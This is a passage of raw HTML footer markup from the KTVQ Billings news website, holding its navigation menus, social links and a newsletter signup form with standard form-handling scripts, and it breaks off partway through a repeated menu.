</div> </div> </div> </div> </div> </div> </section> </div> </div> </div> </div> </div> </section> </div> </div> </div> </div><!-- #content --> </div><!-- .container --> </div><!-- #primary --> </div><!--Layout Content---> <div id="footer-widgets"> <div class="container"> <div class="row"> <section id="elementor-library-2" class="widget widget_elementor-library col-sm-12"><div class="widget-inner"> <div class="elementor elementor-4743 elementor-type-footer"> <div class="elementor-inner"> <div class="elementor-section-wrap"> <section data-id="41cd6c28" class="elementor-element elementor-element-41cd6c28 elementor-section-full_width elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-extended"> <div class="elementor-row"> <div data-id="61dd61ce" class="elementor-element elementor-element-61dd61ce elementor-column elementor-col-100 elementor-top-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <section data-id="352ed198" class="elementor-element elementor-element-352ed198 elementor-section-full_width elementor-hidden-tablet elementor-hidden-phone elementor-section-height-default elementor-section-height-default elementor-section elementor-inner-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-extended"> <div class="elementor-row"> <div data-id="254f8424" class="elementor-element elementor-element-254f8424 elementor-column elementor-col-25 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="5635814" class="elementor-element elementor-element-5635814 elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h5 class="elementor-heading-title elementor-size-medium">SECTIONS</h5> </div> </div> <div data-id="7fef4157" class="elementor-element elementor-element-7fef4157 elementor-nav-menu--indicator-plus elementor-nav-menu__align-left elementor-nav-menu--dropdown-tablet elementor-nav-menu__text-align-aside elementor-nav-menu--toggle elementor-nav-menu--burger elementor-widget elementor-widget-nav-menu" data-settings="{&quot;layout&quot;:&quot;vertical&quot;,&quot;toggle&quot;:&quot;burger&quot;}" data-element_type="nav-menu.default"> <div class="elementor-widget-container"> <nav class="elementor-nav-menu--main elementor-nav-menu__container elementor-nav-menu--layout-vertical e--pointer-text e--animation-skew"><ul id="menu-1-7fef4157" class="elementor-nav-menu sm-vertical"><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-4708"><a href="https://ktvq.com/category/news/" class="elementor-item">News</a> <ul class="sub-menu elementor-nav-menu--dropdown"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4718"><a href="https://ktvq.com/category/news/local-news/" class="elementor-sub-item">Local News</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-88039"><a href="https://ktvq.com/category/news/political-news/" class="elementor-sub-item">Political News</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4720"><a href="https://ktvq.com/category/news/montana-news/" class="elementor-sub-item">Montana News</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4722"><a href="https://ktvq.com/category/news/national-news/" class="elementor-sub-item">National News</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-22664"><a href="https://ktvq.com/category/news/crime-watch/" class="elementor-sub-item">Crime Watch</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-27561"><a href="https://ktvq.com/category/news/digital-original/" class="elementor-sub-item">Digital Original</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22061"><a href="https://ktvq.com/montana-ag-network/" class="elementor-sub-item">Montana Ag Network</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23867"><a href="https://ktvq.com/montana-made/" class="elementor-sub-item">Montana Made</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-13497"><a href="https://ktvq.com/q2-rewind/" class="elementor-sub-item">Q2 Rewind</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-25105"><a href="http://ktvq.com/fire-watch/" class="elementor-sub-item">Fire Watch</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-22085"><a href="https://ktvq.com/category/news/trending/" class="elementor-sub-item">Trending</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4742"><a href="https://ktvq.com/weather/" class="elementor-item">Weather</a> <ul class="sub-menu elementor-nav-menu--dropdown"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4740"><a href="https://ktvq.com/stormtracker-doppler/" class="elementor-sub-item">STORMTracker Doppler</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4762"><a href="https://ktvq.com/travel-conditions/" class="elementor-sub-item">Travel Conditions</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4761"><a href="https://ktvq.com/interactive-radar-map/" class="elementor-sub-item">Interactive Radar Map</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-100993"><a href="http://ktvq.com/ski-report/" class="elementor-sub-item">Ski Report</a></li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4728"><a target="_blank" href="http://montanasports.com" class="elementor-item">Sports</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-4707"><a href="https://ktvq.com/category/community/" class="elementor-item">Community</a> <ul class="sub-menu elementor-nav-menu--dropdown"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-122153"><a target="_blank" href="https://my406deals.incentrev.com/billings/9000104-mtn-powder-pass" class="elementor-sub-item">MTN Powder Pass</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6736"><a target="_blank" href="https://www.q2deals.com/deal/default?redirectUrl=home.action&#038;showSplashPopup=true" class="elementor-sub-item">Foodie Fridays</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22666"><a href="https://ktvq.com/a-better-you/" class="elementor-sub-item">A Better You</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22665"><a href="https://ktvq.com/a-waiting-child/" class="elementor-sub-item">A Waiting Child</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6737"><a target="_blank" href="http://underthebigsky.com" class="elementor-sub-item">Under the Big Sky</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23204"><a href="https://ktvq.com/student-of-the-week/" class="elementor-sub-item">Students of the Week</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-27742"><a href="https://ktvq.com/category/community/athlete-of-the-week/" class="elementor-sub-item">Athlete of the Week</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-39490"><a href="https://ktvq.com/montana-matters/" class="elementor-sub-item">Montana Matters</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-157477"><a href="https://ktvq.com/on-the-job-with-rob/" class="elementor-sub-item">On the Job with Rob</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-38668"><a href="https://ktvq.com/contests/" class="elementor-sub-item">Contests</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23203"><a href="https://ktvq.com/submit-anniversary-or-birthday/" class="elementor-sub-item">Submit Anniversary or Birthday</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-post menu-item-138607"><a href="https://ktvq.com/community/2019/01/31/ktvq-polls/" class="elementor-sub-item">KTVQ Polls</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23376"><a href="https://ktvq.com/one-school-at-a-time/" class="elementor-sub-item">One School at a Time</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-59730"><a target="_blank" href="https://landing.informedinteractive.com/build-billings-billings-hardware/" class="elementor-sub-item">Build Billings</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-184969"><a target="_blank" href="https://ktvq.halfoffdeal.com/index.php?index_type=promo-detail&#038;h=8638457" class="elementor-sub-item">2019 Golf Card</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-27950"><a href="https://ktvq.com/sponsored/" class="elementor-sub-item">Sponsored</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4711"><a href="https://ktvq.com/watch/" class="elementor-item">Watch</a> <ul class="sub-menu elementor-nav-menu--dropdown"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23066"><a href="https://ktvq.com/video/" class="elementor-sub-item">Video</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-40031"><a href="https://ktvq.com/category/photo-galleries/" class="elementor-sub-item">Photo Galleries</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23094"><a href="https://ktvq.com/live/" class="elementor-sub-item">Watch Q2 News Live</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-104619"><a href="https://ktvq.com/on-ktvq/" class="elementor-sub-item">On KTVQ</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4713"><a href="https://ktvq.com/about/" class="elementor-item">About</a> <ul class="sub-menu elementor-nav-menu--dropdown"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23524"><a href="https://ktvq.com/about/" class="elementor-sub-item">Contact Us</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23375"><a href="https://ktvq.com/closed-captioning-information/" class="elementor-sub-item">Closed Captioning Information</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-200934"><a target="_blank" href="https://scripps.com/careers/find-a-job/" class="elementor-sub-item">Jobs at KTVQ</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23373"><a href="https://ktvq.com/q2-apps/" class="elementor-sub-item">Q2 Apps</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25545"><a href="https://ktvq.com/category/news-team/" class="elementor-sub-item">Q2 News Staff</a></li> </ul> </li> </ul></nav> <div class="elementor-menu-toggle"> <i class="eicon" aria-hidden="true"></i> </div> <nav class="elementor-nav-menu--dropdown elementor-nav-menu__container"><ul id="menu-2-7fef4157" class="elementor-nav-menu sm-vertical"><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-4708"><a href="https://ktvq.com/category/news/" class="elementor-item">News</a> <ul class="sub-menu elementor-nav-menu--dropdown"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4718"><a href="https://ktvq.com/category/news/local-news/" class="elementor-sub-item">Local News</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-88039"><a href="https://ktvq.com/category/news/political-news/" class="elementor-sub-item">Political News</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4720"><a href="https://ktvq.com/category/news/montana-news/" class="elementor-sub-item">Montana News</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4722"><a href="https://ktvq.com/category/news/national-news/" class="elementor-sub-item">National News</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-22664"><a href="https://ktvq.com/category/news/crime-watch/" class="elementor-sub-item">Crime Watch</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-27561"><a href="https://ktvq.com/category/news/digital-original/" class="elementor-sub-item">Digital Original</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22061"><a href="https://ktvq.com/montana-ag-network/" class="elementor-sub-item">Montana Ag Network</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23867"><a href="https://ktvq.com/montana-made/" class="elementor-sub-item">Montana Made</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-13497"><a href="https://ktvq.com/q2-rewind/" class="elementor-sub-item">Q2 Rewind</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-25105"><a href="http://ktvq.com/fire-watch/" class="elementor-sub-item">Fire Watch</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-22085"><a href="https://ktvq.com/category/news/trending/" class="elementor-sub-item">Trending</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4742"><a href="https://ktvq.com/weather/" class="elementor-item">Weather</a> <ul class="sub-menu elementor-nav-menu--dropdown"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4740"><a href="https://ktvq.com/stormtracker-doppler/" class="elementor-sub-item">STORMTracker Doppler</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4762"><a href="https://ktvq.com/travel-conditions/" class="elementor-sub-item">Travel Conditions</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4761"><a href="https://ktvq.com/interactive-radar-map/" class="elementor-sub-item">Interactive Radar Map</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-100993"><a href="http://ktvq.com/ski-report/" class="elementor-sub-item">Ski Report</a></li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4728"><a target="_blank" href="http://montanasports.com" class="elementor-item">Sports</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-4707"><a href="https://ktvq.com/category/community/" class="elementor-item">Community</a> <ul class="sub-menu elementor-nav-menu--dropdown"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-122153"><a target="_blank" href="https://my406deals.incentrev.com/billings/9000104-mtn-powder-pass" class="elementor-sub-item">MTN Powder Pass</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6736"><a target="_blank" href="https://www.q2deals.com/deal/default?redirectUrl=home.action&#038;showSplashPopup=true" class="elementor-sub-item">Foodie Fridays</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22666"><a href="https://ktvq.com/a-better-you/" class="elementor-sub-item">A Better You</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22665"><a href="https://ktvq.com/a-waiting-child/" class="elementor-sub-item">A Waiting Child</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6737"><a target="_blank" href="http://underthebigsky.com" class="elementor-sub-item">Under the Big Sky</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23204"><a href="https://ktvq.com/student-of-the-week/" class="elementor-sub-item">Students of the Week</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-27742"><a href="https://ktvq.com/category/community/athlete-of-the-week/" class="elementor-sub-item">Athlete of the Week</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-39490"><a href="https://ktvq.com/montana-matters/" class="elementor-sub-item">Montana Matters</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-157477"><a href="https://ktvq.com/on-the-job-with-rob/" class="elementor-sub-item">On the Job with Rob</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-38668"><a href="https://ktvq.com/contests/" class="elementor-sub-item">Contests</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23203"><a href="https://ktvq.com/submit-anniversary-or-birthday/" class="elementor-sub-item">Submit Anniversary or Birthday</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-post menu-item-138607"><a href="https://ktvq.com/community/2019/01/31/ktvq-polls/" class="elementor-sub-item">KTVQ Polls</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23376"><a href="https://ktvq.com/one-school-at-a-time/" class="elementor-sub-item">One School at a Time</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-59730"><a target="_blank" href="https://landing.informedinteractive.com/build-billings-billings-hardware/" class="elementor-sub-item">Build Billings</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-184969"><a target="_blank" href="https://ktvq.halfoffdeal.com/index.php?index_type=promo-detail&#038;h=8638457" class="elementor-sub-item">2019 Golf Card</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-27950"><a href="https://ktvq.com/sponsored/" class="elementor-sub-item">Sponsored</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4711"><a href="https://ktvq.com/watch/" class="elementor-item">Watch</a> <ul class="sub-menu elementor-nav-menu--dropdown"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23066"><a href="https://ktvq.com/video/" class="elementor-sub-item">Video</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-40031"><a href="https://ktvq.com/category/photo-galleries/" class="elementor-sub-item">Photo Galleries</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23094"><a href="https://ktvq.com/live/" class="elementor-sub-item">Watch Q2 News Live</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-104619"><a href="https://ktvq.com/on-ktvq/" class="elementor-sub-item">On KTVQ</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4713"><a href="https://ktvq.com/about/" class="elementor-item">About</a> <ul class="sub-menu elementor-nav-menu--dropdown"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23524"><a href="https://ktvq.com/about/" class="elementor-sub-item">Contact Us</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23375"><a href="https://ktvq.com/closed-captioning-information/" class="elementor-sub-item">Closed Captioning Information</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-200934"><a target="_blank" href="https://scripps.com/careers/find-a-job/" class="elementor-sub-item">Jobs at KTVQ</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23373"><a href="https://ktvq.com/q2-apps/" class="elementor-sub-item">Q2 Apps</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25545"><a href="https://ktvq.com/category/news-team/" class="elementor-sub-item">Q2 News Staff</a></li> </ul> </li> </ul></nav> </div> </div> </div> </div> </div> <div data-id="52c25fd6" class="elementor-element elementor-element-52c25fd6 elementor-column elementor-col-25 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="3512a77" class="elementor-element elementor-element-3512a77 elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h5 class="elementor-heading-title elementor-size-medium">SOCIAL</h5> </div> </div> <div data-id="7173032" class="elementor-element elementor-element-7173032 elementor-shape-rounded elementor-widget elementor-widget-social-icons" data-element_type="social-icons.default"> <div class="elementor-widget-container"> <div class="elementor-social-icons-wrapper"> <a class="elementor-icon elementor-social-icon elementor-social-icon-youtube" href="https://www.youtube.com/channel/UCN2IWwjVxh4vOnMbnjiM8Hw" target="_blank"> <span class="elementor-screen-only">Youtube</span> <i class="fa fa-youtube"></i> </a> <a class="elementor-icon elementor-social-icon elementor-social-icon-instagram" href="https://www.instagram.com/ktvq/" target="_blank"> <span class="elementor-screen-only">Instagram</span> <i class="fa fa-instagram"></i> </a> <a class="elementor-icon elementor-social-icon elementor-social-icon-facebook" href="https://www.facebook.com/Q2News/" target="_blank"> <span class="elementor-screen-only">Facebook</span> <i class="fa fa-facebook"></i> </a> <a class="elementor-icon elementor-social-icon elementor-social-icon-twitter" href="https://twitter.com/ktvq" target="_blank"> <span class="elementor-screen-only">Twitter</span> <i class="fa fa-twitter"></i> </a> <a class="elementor-icon elementor-social-icon elementor-social-icon-envelope" href="https://ktvq.com/ktvq/about/" target="_blank"> <span class="elementor-screen-only">Envelope</span> <i class="fa fa-envelope"></i> </a> </div> </div> </div> <div data-id="363727c5" class="elementor-element elementor-element-363727c5 elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h5 class="elementor-heading-title elementor-size-medium">Work with us</h5> </div> </div> <div data-id="36f2086a" class="elementor-element elementor-element-36f2086a elementor-widget elementor-widget-text-editor" data-element_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><p>Current job openings at <a href="https://scripps.com/careers/find-a-job/" target="_blank" rel="noopener">KTVQ</a> </p></div> </div> </div> </div> </div> </div> <div data-id="2b107e2" class="elementor-element elementor-element-2b107e2 elementor-column elementor-col-25 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="4288480" class="elementor-element elementor-element-4288480 elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h5 class="elementor-heading-title elementor-size-medium">ABOUT KTVQ</h5> </div> </div> <div data-id="53956475" class="elementor-element elementor-element-53956475 elementor-widget elementor-widget-text-editor" data-element_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><p>KTVQ.com is your source for continuous news, sports and weather information for Billings, Montana.</p><ul><li><a href="https://ktvq.com/about/">About us</a></li><li><a href="https://ktvq.com/about/">Contact us</a></li></ul></div> </div> </div> </div> </div> </div> <div data-id="533e5279" class="elementor-element elementor-element-533e5279 elementor-column elementor-col-25 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="47d55773" class="elementor-element elementor-element-47d55773 elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h5 class="elementor-heading-title elementor-size-medium">KTVQ email newsletters</h5> </div> </div> <div data-id="18131840" class="elementor-element elementor-element-18131840 elementor-widget elementor-widget-wp-widget-gform_widget" data-element_type="wp-widget-gform_widget.default"> <div class="elementor-widget-container"> <link rel='stylesheet' id='gforms_reset_css-css' href='https://ktvq.com/wp-content/plugins/gravityforms/css/formreset.min.css?ver=2.3.2.15' type='text/css' media='all' /> <link rel='stylesheet' id='gforms_formsmain_css-css' href='https://ktvq.com/wp-content/plugins/gravityforms/css/formsmain.min.css?ver=2.3.2.15' type='text/css' media='all' /> <link rel='stylesheet' id='gforms_ready_class_css-css' href='https://ktvq.com/wp-content/plugins/gravityforms/css/readyclass.min.css?ver=2.3.2.15' type='text/css' media='all' /> <link rel='stylesheet' id='gforms_browsers_css-css' href='https://ktvq.com/wp-content/plugins/gravityforms/css/browsers.min.css?ver=2.3.2.15' type='text/css' media='all' /> <div class='gf_browser_chrome gform_wrapper' id='gform_wrapper_1' ><form method='post' enctype='multipart/form-data' id='gform_1' action='/'> <div class='gform_body'><ul id='gform_fields_1' class='gform_fields top_label form_sublabel_below description_below'><li id='field_1_1' class='gfield gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible' ><label class='gfield_label' for='input_1_1' >Email Address<span class='gfield_required'>*</span></label><div class='ginput_container ginput_container_email'> <input name='input_1' id='input_1_1' type='email' value='' class='large' tabindex='1' aria-required="true" aria-invalid="false"/> </div></li><li id='field_1_2' class='gfield field_sublabel_below field_description_below gfield_visibility_visible' ><label class='gfield_label' ></label><div class='ginput_container ginput_container_checkbox'><ul class='gfield_checkbox' id='input_1_2'><li class='gchoice_select_all'> <input type='checkbox' id='choice_2_select_all' tabindex='2' onclick='gformToggleCheckboxes( this )' onkeypress='gformToggleCheckboxes( this )' /> <label for='choice_2_select_all' id='label_2_select_all' data-label-select='Select All' data-label-deselect='Deselect All'>Select All</label> </li><li class='gchoice_1_2_1'> <input name='input_2.1' type='checkbox' value='Morning News Headlines' id='choice_1_2_1' tabindex='3' /> <label for='choice_1_2_1' id='label_1_2_1'>Morning News Headlines</label> </li><li class='gchoice_1_2_2'> <input name='input_2.2' type='checkbox' value='Evening News Headlines' id='choice_1_2_2' tabindex='4' /> <label for='choice_1_2_2' id='label_1_2_2'>Evening News Headlines</label> </li><li class='gchoice_1_2_3'> <input name='input_2.3' type='checkbox' value='Breaking News Alerts' id='choice_1_2_3' tabindex='5' /> <label for='choice_1_2_3' id='label_1_2_3'>Breaking News Alerts</label> </li><li class='gchoice_1_2_4'> <input name='input_2.4' type='checkbox' value='KTVQ Contests' id='choice_1_2_4' tabindex='6' /> <label for='choice_1_2_4' id='label_1_2_4'>KTVQ Contests</label> </li><li class='gchoice_1_2_5'> <input name='input_2.5' type='checkbox' value='KTVQ Coupon and Special Offers' id='choice_1_2_5' tabindex='7' /> <label for='choice_1_2_5' id='label_1_2_5'>KTVQ Coupon and Special Offers</label> </li></ul></div></li> </ul></div> <div class='gform_footer top_label'> <input type='submit' id='gform_submit_button_1' class='gform_button button' value='Subscribe' tabindex='8' onclick='if(window["gf_submitting_1"]){return false;} if( !jQuery("#gform_1")[0].checkValidity || jQuery("#gform_1")[0].checkValidity()){window["gf_submitting_1"]=true;} ' onkeypress='if( event.keyCode == 13 ){ if(window["gf_submitting_1"]){return false;} if( !jQuery("#gform_1")[0].checkValidity || jQuery("#gform_1")[0].checkValidity()){window["gf_submitting_1"]=true;} jQuery("#gform_1").trigger("submit",[true]); }' /> <input type='hidden' class='gform_hidden' name='is_submit_1' value='1' /> <input type='hidden' class='gform_hidden' name='gform_submit' value='1' /> <input type='hidden' class='gform_hidden' name='gform_unique_id' value='' /> <input type='hidden' class='gform_hidden' name='state_1' value='WyJbXSIsIjc1MGFjYWQyMmYzNzJiYWY5NzQwMjRjYjI3MzU1YzNiIl0=' /> <input type='hidden' class='gform_hidden' name='gform_target_page_number_1' id='gform_target_page_number_1' value='0' /> <input type='hidden' class='gform_hidden' name='gform_source_page_number_1' id='gform_source_page_number_1' value='1' /> <input type='hidden' name='gform_field_values' value='' /> </div> </form> </div><script type='text/javascript'> if(typeof gf_global == 'undefined') var gf_global = {"gf_currency_config":{"name":"U.S. Dollar","symbol_left":"$","symbol_right":"","symbol_padding":"","thousand_separator":",","decimal_separator":".","decimals":2},"base_url":"https:\/\/ktvq.com\/wp-content\/plugins\/gravityforms","number_formats":[],"spinnerUrl":"https:\/\/ktvq.com\/wp-content\/plugins\/gravityforms\/images\/spinner.gif"};jQuery(document).bind('gform_post_render', function(event, formId, currentPage){if(formId == 1) {} } );jQuery(document).bind('gform_post_conditional_logic', function(event, formId, fields, isInit){} );</script><script type='text/javascript'> jQuery(document).ready(function(){jQuery(document).trigger('gform_post_render', [1, 1]) } ); </script> </div> </div> </div> </div> </div> </div> </div> </section> <section data-id="67724b17" class="elementor-element elementor-element-67724b17 elementor-section-full_width elementor-hidden-desktop elementor-section-height-default elementor-section-height-default elementor-section elementor-inner-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-no"> <div class="elementor-row"> <div data-id="7c01e339" class="elementor-element elementor-element-7c01e339 elementor-column elementor-col-100 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="665a2da8" class="elementor-element elementor-element-665a2da8 elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h5 class="elementor-heading-title elementor-size-medium">SECTIONS</h5> </div> </div> <div data-id="2b70fa4a" class="elementor-element elementor-element-2b70fa4a elementor-nav-menu--indicator-plus elementor-nav-menu__align-left elementor-nav-menu__text-align-center elementor-nav-menu--dropdown-tablet elementor-nav-menu--toggle elementor-nav-menu--burger elementor-widget elementor-widget-nav-menu" data-settings="{&quot;layout&quot;:&quot;vertical&quot;,&quot;toggle&quot;:&quot;burger&quot;}" data-element_type="nav-menu.default"> <div class="elementor-widget-container"> <nav class="elementor-nav-menu--main elementor-nav-menu__container elementor-nav-menu--layout-vertical e--pointer-text e--animation-none"><ul id="menu-1-2b70fa4a" class="elementor-nav-menu sm-vertical"><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-4708"><a href="https://ktvq.com/category/news/" class="elementor-item">News</a> <ul class="sub-menu elementor-nav-menu--dropdown"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4718"><a href="https://ktvq.com/category/news/local-news/" class="elementor-sub-item">Local News</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-88039"><a href="https://ktvq.com/category/news/political-news/" class="elementor-sub-item">Political News</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4720"><a href="https://ktvq.com/category/news/montana-news/" class="elementor-sub-item">Montana News</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4722"><a href="https://ktvq.com/category/news/national-news/" class="elementor-sub-item">National News</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-22664"><a href="https://ktvq.com/category/news/crime-watch/" class="elementor-sub-item">Crime Watch</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-27561"><a href="https://ktvq.com/category/news/digital-original/" class="elementor-sub-item">Digital Original</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22061"><a href="https://ktvq.com/montana-ag-network/" class="elementor-sub-item">Montana Ag Network</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23867"><a href="https://ktvq.com/montana-made/" class="elementor-sub-item">Montana Made</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-13497"><a href="https://ktvq.com/q2-rewind/" class="elementor-sub-item">Q2 Rewind</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-25105"><a href="http://ktvq.com/fire-watch/" class="elementor-sub-item">Fire Watch</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-22085"><a href="https://ktvq.com/category/news/trending/" class="elementor-sub-item">Trending</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4742"><a href="https://ktvq.com/weather/" class="elementor-item">Weather</a> <ul class="sub-menu elementor-nav-menu--dropdown"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4740"><a href="https://ktvq.com/stormtracker-doppler/" class="elementor-sub-item">STORMTracker Doppler</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4762"><a href="https://ktvq.com/travel-conditions/" class="elementor-sub-item">Travel Conditions</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4761"><a href="https://ktvq.com/interactive-radar-map/" class="elementor-sub-item">Interactive Radar Map</a></li> <li class="menu-item menu-item-type-custom 